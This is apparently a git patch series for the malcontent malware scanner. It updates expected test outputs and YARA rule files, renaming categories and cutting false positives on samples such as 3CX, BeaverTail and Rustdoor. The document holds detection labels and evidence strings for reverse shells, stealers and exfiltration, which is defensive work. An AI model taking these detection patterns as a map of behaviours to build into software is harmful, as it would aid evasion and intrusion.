[0x4d63](https://github.com/search?q=0x4d63&type=code)
[0x4f4c](https://github.com/search?q=0x4f4c&type=code)
[0x504b4453](https://github.com/search?q=0x504b4453&type=code)
[0x5356](https://github.com/search?q=0x5356&type=code)
[0x5455](https://github.com/search?q=0x5455&type=code)
[0x554e](https://github.com/search?q=0x554e&type=code)
[0x5855](https://github.com/search?q=0x5855&type=code)
[0x5a4c](https://github.com/search?q=0x5a4c&type=code)
[0x5a4d](https://github.com/search?q=0x5a4d&type=code)
[0x6375](https://github.com/search?q=0x6375&type=code)
[0x6542](https://github.com/search?q=0x6542&type=code)
[0x6854](https://github.com/search?q=0x6854&type=code)
[0x6dff800d](https://github.com/search?q=0x6dff800d&type=code)
[0x7075](https://github.com/search?q=0x7075&type=code)
[0x7109871a](https://github.com/search?q=0x7109871a&type=code)
[0x71777777](https://github.com/search?q=0x71777777&type=code)
[0x7441](https://github.com/search?q=0x7441&type=code)
[0x756e](https://github.com/search?q=0x756e&type=code)
[0x7855](https://github.com/search?q=0x7855&type=code)
[0x7875](https://github.com/search?q=0x7875&type=code)
[0x7FFF](https://github.com/search?q=0x7FFF&type=code)
[0x7f](https://github.com/search?q=0x7f&type=code)
[0x8000](https://github.com/search?q=0x8000&type=code)
[0x9901](https://github.com/search?q=0x9901&type=code)
[0xA220](https://github.com/search?q=0xA220&type=code)
[0xCAFE](https://github.com/search?q=0xCAFE&type=code)
[0xE9F3F9F0](https://github.com/search?q=0xE9F3F9F0&type=code)
[0xFFFFFFFF](https://github.com/search?q=0xFFFFFFFF&type=code)
[0xa11e](https://github.com/search?q=0xa11e&type=code)
[0xf05368c0](https://github.com/search?q=0xf05368c0&type=code)
[0xfb4a](https://github.com/search?q=0xfb4a&type=code)
[0xff3b5998](https://github.com/search?q=0xff3b5998&type=code)
[\x00](https://github.com/search?q=%5Cx00&type=code)
[\x01](https://github.com/search?q=%5Cx01&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [ZIP64](https://github.com/search?q=ZIP64&type=code)
[zip files](https://github.com/search?q=zip+files&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/opt/perl/bin/perl](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fperl%2Fbin%2Fperl&type=code) | | LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | | LOW | [fs/path/usr_bin](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/usr-bin.yara#usr_bin_path) | path reference within /usr/bin | [/usr/bin/perl](https://github.com/search?q=%2Fusr%2Fbin%2Fperl&type=code) | diff --git a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff index 327667eb1187fda8550949b91eabc61d7f6798c4..4103bb6b07683ee18884603a1261365db3b59e05 100644 GIT binary patch delta 64 zcmaE}jp@xcrVaLL+-aFPsrm&)scD%NlP^wjkSt3q&dkr#M-qm~u2Hj?Y#_zG`I%Z< F2>@mF8ZH0; delta 69 zcmaE}jp@xcrVaLL!Wo$[chmod](https://github.com/search?q=chmod&type=code)
[flock](https://github.com/search?q=flock&type=code)
[gethostname](https://github.com/search?q=gethostname&type=code)
[localtime](https://github.com/search?q=localtime&type=code)
[pclose](https://github.com/search?q=pclose&type=code)
[popen](https://github.com/search?q=popen&type=code)
[rand](https://github.com/search?q=rand&type=code)
[sleep](https://github.com/search?q=sleep&type=code)
[sprintf](https://github.com/search?q=sprintf&type=code)
[strncpy](https://github.com/search?q=strncpy&type=code) | | +MEDIUM | **[data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode)** | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | -| +MEDIUM | **[evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | +| +MEDIUM | **[evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | | +MEDIUM | **[exec/cmd/pipe](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen)** | [launches program and reads its output](https://linux.die.net/man/3/popen) | [_pclose](https://github.com/search?q=_pclose&type=code)
[_popen](https://github.com/search?q=_popen&type=code) | | +MEDIUM | **[exec/shell/arbitrary_command_dev_null](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/arbitrary_command-dev_null.yara#cmd_dev_null)** | runs commands, discards output | ["%s" >/dev/null](https://github.com/search?q=%22%25s%22+%3E%2Fdev%2Fnull&type=code) | | +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) | diff --git a/tests/macOS/2023.3CX/libffmpeg.decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.decrease.mdiff index 327667eb1187fda8550949b91eabc61d7f6798c4..4103bb6b07683ee18884603a1261365db3b59e05 100644 GIT binary patch delta 64 zcmaE}jp@xcrVaLL+-aFPsrm&)scD%NlP^wjkSt3q&dkr#M-qm~u2Hj?Y#_zG`I%Z< F2>@mF8ZH0; delta 69 zcmaE}jp@xcrVaLL!Wo$[chmod](https://github.com/search?q=chmod&type=code)
[flock](https://github.com/search?q=flock&type=code)
[gethostname](https://github.com/search?q=gethostname&type=code)
[localtime](https://github.com/search?q=localtime&type=code)
[pclose](https://github.com/search?q=pclose&type=code)
[popen](https://github.com/search?q=popen&type=code)
[rand](https://github.com/search?q=rand&type=code)
[sleep](https://github.com/search?q=sleep&type=code)
[sprintf](https://github.com/search?q=sprintf&type=code)
[strncpy](https://github.com/search?q=strncpy&type=code) | | +MEDIUM | **[data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode)** | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | -| +MEDIUM | **[evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | +| +MEDIUM | **[evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | | +MEDIUM | **[exec/cmd/pipe](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen)** | [launches program and reads its output](https://linux.die.net/man/3/popen) | [_pclose](https://github.com/search?q=_pclose&type=code)
[_popen](https://github.com/search?q=_popen&type=code) | | +MEDIUM | **[exec/shell/arbitrary_command_dev_null](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/arbitrary_command-dev_null.yara#cmd_dev_null)** | runs commands, discards output | ["%s" >/dev/null](https://github.com/search?q=%22%25s%22+%3E%2Fdev%2Fnull&type=code) | | +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) | diff --git a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff index 5df35e886..61fe8e8c7 100644 --- a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff @@ -24,7 +24,7 @@ | +CRITICAL | **[anti-static/xor/user_agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/xor/xor-user_agent.yara#xor_mozilla)** | XOR'ed user agent, often found in backdoors, by Florian Roth | [7UOTJ::$Mozilla_5_0](https://github.com/search?q=7%15%00%13%16%16%1BUOTJ%3A%3A%24Mozilla_5_0&type=code) | | +CRITICAL | **[impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#lazarus_darwin_nsurl)** | executes programs, sets permissions, sleeps, makes HTTP requests | [NSMutableURLRequest](https://github.com/search?q=NSMutableURLRequest&type=code)
[chmod](https://github.com/search?q=chmod&type=code)
[flock](https://github.com/search?q=flock&type=code)
[gethostname](https://github.com/search?q=gethostname&type=code)
[localtime](https://github.com/search?q=localtime&type=code)
[pclose](https://github.com/search?q=pclose&type=code)
[popen](https://github.com/search?q=popen&type=code)
[rand](https://github.com/search?q=rand&type=code)
[sleep](https://github.com/search?q=sleep&type=code)
[sprintf](https://github.com/search?q=sprintf&type=code)
[strncpy](https://github.com/search?q=strncpy&type=code) | | +MEDIUM | **[data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode)** | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | -| +MEDIUM | **[evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | +| +MEDIUM | **[evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | | +MEDIUM | **[exec/cmd/pipe](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen)** | [launches program and reads its output](https://linux.die.net/man/3/popen) | [_pclose](https://github.com/search?q=_pclose&type=code)
[_popen](https://github.com/search?q=_popen&type=code) | | +MEDIUM | **[exec/shell/arbitrary_command_dev_null](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/arbitrary_command-dev_null.yara#cmd_dev_null)** | runs commands, discards output | ["%s" >/dev/null](https://github.com/search?q=%22%25s%22+%3E%2Fdev%2Fnull&type=code) | | +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) | diff --git a/tests/macOS/2024.79-137-192-4/var_tmp_exe_starting2.simple b/tests/macOS/2024.79-137-192-4/var_tmp_exe_starting2.simple index a73095bc6..845055316 100644 --- a/tests/macOS/2024.79-137-192-4/var_tmp_exe_starting2.simple +++ b/tests/macOS/2024.79-137-192-4/var_tmp_exe_starting2.simple @@ -1,7 +1,7 @@ # macOS/2024.79-137-192-4/var_tmp_exe_starting2: critical anti-static/xor/certs: high c2/tool_transfer/osascript: high -evasion/hidden_paths/var_tmp: medium +evasion/file/location/var_tmp: medium exec/script/osa: medium exec/shell/exec: medium fs/file/make_executable: high diff --git a/tests/macOS/2024.BeaverTail/Jami.json b/tests/macOS/2024.BeaverTail/Jami.json index 2728b51ed..fb6273f27 100644 --- a/tests/macOS/2024.BeaverTail/Jami.json +++ b/tests/macOS/2024.BeaverTail/Jami.json @@ -37,6 +37,14 @@ "ID": "anti-static/binary/opaque", "RuleName": "opaque_binary" }, + { + "Description": "higher entropy binary (\u003e7.2)", + "RiskScore": 2, + "RiskLevel": "MEDIUM", + "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/macho/entropy.yara#high_entropy_7_2", + "ID": "anti-static/macho/entropy", + "RuleName": "high_entropy_7_2" + }, { "Description": "higher-entropy machO trailer (normally NULL) - possible viral infection", "MatchStrings": [ 
diff --git a/tests/macOS/2024.BeaverTail/client_5346.py.simple b/tests/macOS/2024.BeaverTail/client_5346.py.simple
index 54e68b086..1a44a30ed 100644
--- a/tests/macOS/2024.BeaverTail/client_5346.py.simple
+++ b/tests/macOS/2024.BeaverTail/client_5346.py.simple
@@ -4,7 +4,7 @@ c2/tool_transfer/python: high
 data/encoding/base64: low
 discover/system/platform: medium
 discover/user/HOME: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 evasion/indicator_blocking/mask_exceptions: medium
 exec/imports/python: medium
 exec/install_additional/pip_install: high
diff --git a/tests/macOS/2024.Ezuri/libdpt1.so.simple b/tests/macOS/2024.Ezuri/libdpt1.so.simple
index 5851a1c32..b43228808 100644
--- a/tests/macOS/2024.Ezuri/libdpt1.so.simple
+++ b/tests/macOS/2024.Ezuri/libdpt1.so.simple
@@ -12,6 +12,7 @@ fs/path/users: medium
 fs/permission/chown: medium
 fs/permission/modify: medium
 impact/remote_access/net_exec: medium
+lateral/scan/tool: medium
 net/socket/receive: low
 net/socket/send: low
 process/multithreaded: low
diff --git a/tests/macOS/2024.LightSpy/dropper.simple b/tests/macOS/2024.LightSpy/dropper.simple
index 8e89a4371..876122683 100644
--- a/tests/macOS/2024.LightSpy/dropper.simple
+++ b/tests/macOS/2024.LightSpy/dropper.simple
@@ -9,7 +9,7 @@ data/hash/md5: medium
 discover/system/cpu_info: low
 discover/system/network: high
 discover/system/platform: medium
-evasion/hidden_paths/odd_pidfile: high
+evasion/file/location/odd_pidfile: high
 exec/dylib/symbol_address: medium
 exec/dylib/user: medium
 exec/plugin: low
diff --git a/tests/macOS/2024.Rustdoor/localfile.simple b/tests/macOS/2024.Rustdoor/localfile.simple
index 93837a90a..d5fe25d55 100644
--- a/tests/macOS/2024.Rustdoor/localfile.simple
+++ b/tests/macOS/2024.Rustdoor/localfile.simple
@@ -20,10 +20,10 @@ discover/system/cpu_info: medium discover/system/hardware_info: low discover/system/hostname_get: low discover/user/USER: low -evasion/hidden_paths/relative_hidden: low exec/dylib/symbol_address: medium exec/program: medium exec/program/background: low +exec/program/hidden: low exec/script/osa: medium exec/shell/exec: medium exfil/stealer/notes: critical @@ -45,6 +45,7 @@ fs/tempdir: low fs/tempdir/TMPDIR: low hw/disk_info: medium impact/remote_access/reverse_shell: medium +lateral/scan/tool: medium malware/family/rustdoor: critical net/download: medium net/download/fetch: high diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff index 939d68075..cf15f5aae 100644 --- a/tests/macOS/clean/ls.mdiff +++ b/tests/macOS/clean/ls.mdiff @@ -2,6 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |---------|--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| -MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | | -LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | | -LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | diff --git a/tests/macOS/clean/ls.sdiff.level_2 b/tests/macOS/clean/ls.sdiff.level_2 index fa0ab56fa..f2fe90892 100644 --- a/tests/macOS/clean/ls.sdiff.level_2 +++ b/tests/macOS/clean/ls.sdiff.level_2 @@ -1,3 +1,4 @@ --- missing: ls.x86_64 +-lateral/scan/tool -process/name_set ++++ added: ls diff --git a/tests/macOS/clean/ls.sdiff.trigger_2 b/tests/macOS/clean/ls.sdiff.trigger_2 index 9e0e93a9c..3ed486b6c 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_2 +++ b/tests/macOS/clean/ls.sdiff.trigger_2 @@ -3,6 +3,7 @@ -discover/system/hostname_get -exec/shell/TERM -fs/link_read +-lateral/scan/tool -net/url/embedded -process/name_set ++++ added: ls diff --git a/tests/macOS/clean/ls.sdiff.trigger_3 b/tests/macOS/clean/ls.sdiff.trigger_3 index 9e0e93a9c..3ed486b6c 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_3 +++ b/tests/macOS/clean/ls.sdiff.trigger_3 @@ -3,6 +3,7 @@ -discover/system/hostname_get -exec/shell/TERM -fs/link_read +-lateral/scan/tool -net/url/embedded -process/name_set ++++ added: ls 
diff --git a/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple b/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple index fbaac975e..20bc9d6e8 100644 --- a/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple +++ b/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple @@ -1,7 +1,7 @@ # npm/2024.legacyreact-aws-s3-typescript/package.json: critical c2/tool_transfer/npm: critical c2/tool_transfer/shell: high -evasion/hidden_paths/relative_hidden: low +exec/program/hidden: low exec/shell/background_launcher: high exfil/npm: high fs/file/make_executable: medium diff --git a/tests/php/clean/composer-2.7.7.simple b/tests/php/clean/composer-2.7.7.simple index 912b8d72f..3732878d1 100644 --- a/tests/php/clean/composer-2.7.7.simple +++ b/tests/php/clean/composer-2.7.7.simple @@ -22,7 +22,7 @@ discover/system/hostname_get: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/hijack_execution/DYLD_LIBRARY_PATH: medium exec/cmd: medium exec/plugin: low diff --git a/tests/php/clean/run-tests.php.simple b/tests/php/clean/run-tests.php.simple index 55d7d2da0..d6586237e 100644 --- a/tests/php/clean/run-tests.php.simple +++ b/tests/php/clean/run-tests.php.simple @@ -18,6 +18,7 @@ fs/symlink_resolve: low fs/tempdir: low fs/tempdir/TEMP: low impact/remote_access/reverse_shell: medium +lateral/scan/tool: medium net/http/cookies: medium net/http/form_upload: medium net/http/post: medium diff --git a/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple b/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple index 27cd557ff..a382541db 100644 --- a/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple +++ b/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple 
@@ -5,7 +5,7 @@ discover/network/interface_list: medium discover/system/network: high discover/system/platform: medium discover/user/name_get: high -evasion/hidden_paths/hidden: high +evasion/file/prefix: high exec/cmd/pipe: medium exec/program: medium exec/shell/command: medium diff --git a/tests/python/2023.JokerSpy/shared.dat.simple b/tests/python/2023.JokerSpy/shared.dat.simple index b6a0be7c5..4717f624a 100644 --- a/tests/python/2023.JokerSpy/shared.dat.simple +++ b/tests/python/2023.JokerSpy/shared.dat.simple @@ -9,7 +9,7 @@ discover/network/interface_list: medium discover/system/network: high discover/system/platform: medium discover/user/name_get: low -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium exec/program: medium exec/remote_commands/code_eval: medium exec/tty/getpass: low diff --git a/tests/python/clean/numpy/misc_util.py.simple b/tests/python/clean/numpy/misc_util.py.simple index dc993294a..6907bcce7 100644 --- a/tests/python/clean/numpy/misc_util.py.simple +++ b/tests/python/clean/numpy/misc_util.py.simple @@ -1,7 +1,7 @@ # python/clean/numpy/misc_util.py: medium anti-static/obfuscation/python: medium discover/system/platform: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium exec/install_additional/pip_install: medium exec/program: medium exec/remote_commands/code_eval: medium diff --git a/tests/windows/2024.aspdasdksa2/creal.exe.simple b/tests/windows/2024.aspdasdksa2/creal.exe.simple index d6c10054b..7705f417c 100644 --- a/tests/windows/2024.aspdasdksa2/creal.exe.simple +++ b/tests/windows/2024.aspdasdksa2/creal.exe.simple @@ -18,6 +18,7 @@ fs/file/delete: medium fs/file/read: low fs/file/write: low fs/path/relative: medium +lateral/scan/tool: medium net/dns/txt: low net/url/embedded: low net/url/parse: low diff --git a/tests/windows/2024.aspdasdksa2/creal.pyc.simple b/tests/windows/2024.aspdasdksa2/creal.pyc.simple index 35c4226f7..fae239ad2 100644 --- a/tests/windows/2024.aspdasdksa2/creal.pyc.simple 
+++ b/tests/windows/2024.aspdasdksa2/creal.pyc.simple @@ -26,6 +26,7 @@ exfil/stealer/credit_card: medium exfil/stealer/creds: high exfil/stealer/discord: high exfil/stealer/wallet: critical +lateral/scan/tool: medium net/download: medium net/download/fetch: medium net/http/fake_user_agent: medium From 960782bbc405e0e7c94569df9629ea3a44c3e0eb Mon Sep 17 00:00:00 2001 
From: Thomas Stromberg Date: Sat, 9 Nov 2024 16:31:42 -0500 Subject: [PATCH 2/7] address more Ubuntu high false-positive --- pkg/action/testdata/scan_archive | 1 - .../{packer/elf.yara => elf/content.yara} | 20 +---- rules/anti-static/elf/entropy.yara | 8 +- rules/anti-static/elf/header.yara | 19 ++++ rules/anti-static/elf/tiny.yara | 9 ++ rules/anti-static/{binary => macho}/tiny.yara | 9 -- rules/anti-static/obfuscation/bitwise.yara | 4 +- rules/anti-static/obfuscation/python.yara | 3 +- rules/c2/addr/ip.yara | 13 +-- rules/c2/addr/url.yara | 36 ++++++-- rules/c2/tool_transfer/shell.yara | 9 +- rules/credential/ssh/ssh.yara | 21 ++++- .../process/effective-groupid-get.yara | 0 .../process/effective-userid-get.yara | 0 rules/{ => discover}/process/limit-get.yara | 0 rules/{ => discover}/process/name-get.yara | 0 .../process/parent_pid-get.yara | 0 rules/{ => discover}/process/pid-get.yara | 0 .../{ => discover}/process/priority-get.yara | 0 rules/discover/process/runtime_deps.yara | 27 ++++++ rules/{ => discover}/process/userid-get.yara | 0 .../process/working_directory-get.yara | 0 .../evasion/file/location/chdir-unusual.yara | 3 +- .../{odd_pidfile.yara => pidfile.yara} | 0 .../file/location/system_directories.yara | 14 --- .../file/location/system_directory.yara | 15 ++++ .../{tmp_x11-unix.yara => x11-unix.yara} | 6 +- rules/evasion/file/prefix/lib.yara | 2 +- rules/evasion/file/prefix/prefix.yara | 2 + .../hijack_execution/etc-ld.so.preload.yara | 2 +- rules/evasion/logging/hide_shell_history.yara | 1 - rules/evasion/logging/historical_logins.yara | 2 +- rules/evasion/mimicry/fake-library.yara | 6 +- rules/evasion/net/http_443.yara | 2 +- rules/evasion/rootkit/linux_kernel.yara | 2 +- rules/exec/shell/nohup.yara | 15 ---- rules/exec/shell/sighup_trap.yara | 14 +++ rules/false_positives/libdw.yara | 10 +++ rules/false_positives/linux_src.yara | 1 + rules/false_positives/sudo.yara | 2 +- rules/false_positives/vmtools.yara | 6 +- 
.../permission-modify-dangerous.yara | 2 +- rules/fs/proc/pid-exe.yara | 30 +++++-- rules/hw/dev/sd_mmc.yara | 18 +++- rules/hw/dev/ubi.yara | 11 +++ rules/impact/degrade/firewall.yara | 2 +- rules/impact/exploit/exploit.yara | 13 ++- rules/impact/remote_access/backdoor.yara | 4 +- rules/impact/remote_access/listen_shell.yara | 7 +- rules/impact/remote_access/net_term.yara | 19 ++-- rules/lateral/scan/scan_tool.yara | 12 +-- rules/net/download/fetch.yara | 1 + .../persist/kernel_module/symbol-lookup.yara | 14 +++ rules/process/thread_local_storage.yara | 11 --- tests/does-nothing/does-nothing.simple | 1 - .../lottie-player.min.js.mdiff | 3 +- .../clean/203.b7219352.chunk.js.simple | 1 - ...4796BB27126E03A7E25DD5D589.cache.js.simple | 4 +- ...D016DDDA0665CB8CD8EEA6C537.cache.js.simple | 4 +- tests/javascript/clean/connection.js.simple | 1 - tests/javascript/clean/faker.js.simple | 2 - tests/javascript/clean/faker.min.js.simple | 2 - .../clean/frequency_lists.js.simple | 1 - tests/javascript/clean/mode-php.js.simple | 4 +- .../clean/mode-php_laravel_blade.js.simple | 4 +- tests/javascript/clean/php.js.simple | 4 +- .../clean/securityDashboards.plugin.js.simple | 1 - tests/javascript/clean/zxcvbn.js.simple | 1 - tests/linux/2021.FontOnLake/45E9.elf.simple | 3 +- tests/linux/2021.XMR-Stak/1b1a56.elf.simple | 2 +- .../2022.bpfdoor/2023.ConnectBack/tiny.md | 1 - tests/linux/2022.bpfdoor/bpfdoor_2.simple | 1 - tests/linux/2022.ez-pwnkit/payload.simple | 1 - tests/linux/2023.ConnectBack/tiny.md | 1 - .../2023.Gafgyt/5636cddb43.elf.x86.simple | 1 + .../wyoming-xray-undress-robert.simple | 1 + .../eight-nebraska-autumn-illinois.simple | 1 - tests/linux/2024.Mirai/ppc.simple | 1 - .../uranus-ack-mike-cat.simple | 1 - tests/linux/2024.chisel/crondx.simple | 1 - ...4084b7471bc5aed1c81803054f017240a72.simple | 1 - tests/linux/2024.gas/gas.simple | 1 - tests/linux/2024.kubo_injector/injector.json | 15 +++- .../emp3r0r.agent.simple | 2 - .../2024.kworker_pretenders/gafgyt.simple | 
1 - tests/linux/2024.medusa/rkload.simple | 3 +- tests/linux/UPX/06ed158.md | 2 +- tests/linux/clean/appsec-rules.json.simple | 1 - tests/linux/clean/busybox.simple | 2 +- tests/linux/clean/caddy.simple | 2 +- tests/linux/clean/chezmoi.simple | 2 +- tests/linux/clean/chrome.simple | 6 +- tests/linux/clean/clickhouse.simple | 4 +- tests/linux/clean/code-oss.md | 10 +-- tests/linux/clean/containerd.simple | 1 - tests/linux/clean/cpack.md | 4 +- tests/linux/clean/default_config.json.simple | 1 - .../kibana/securitySolution.chunk.9.js.simple | 5 +- tests/linux/clean/kuma-cp.simple | 1 - tests/linux/clean/ld-2.27.so.simple | 2 +- tests/linux/clean/libgcj.so.17.0.0.simple | 6 +- tests/linux/clean/libgcj.so.17.simple | 6 +- tests/linux/clean/libsystemd.so.0.simple | 5 +- tests/linux/clean/ls.x86_64.md | 1 - tests/linux/clean/lslogins.md | 4 +- tests/linux/clean/melange.simple | 3 +- tests/linux/clean/mongosh.simple | 5 +- tests/linux/clean/nvim.simple | 3 +- tests/linux/clean/opa.simple | 1 - tests/linux/clean/pandoc.md | 6 +- tests/linux/clean/ping.x86_64.md | 1 - tests/linux/clean/pulumi.simple | 2 +- .../clean/pypi_package_index.json.simple | 1 - tests/linux/clean/qemu-system-xtensa.md | 6 +- tests/linux/clean/redis-server.aarch64.md | 1 - tests/linux/clean/rules.json.simple | 1 - .../clean/runtime-security-fentry.o.simple | 1 - .../runtime-security-syscall-wrapper.o.simple | 1 - tests/linux/clean/runtime-security.o.simple | 1 - tests/linux/clean/searchindex.json.simple | 4 +- tests/linux/clean/slack.md | 6 +- tests/linux/clean/slirp4netns.simple | 2 +- .../clean/sonarlint-metadata.json.simple | 1 - tests/linux/clean/sudo.simple | 5 +- tests/linux/clean/tracer.o.aarch64.simple | 3 +- tests/linux/clean/tree-sitter.md | 87 +++++++++---------- tests/linux/clean/trivy.simple | 2 +- tests/linux/clean/trufflehog.md | 6 +- tests/linux/clean/viewgam.md | 1 - tests/linux/clean/wolfictl.simple | 2 +- .../mimipenguin/python/mimipenguin.simple | 2 +- 
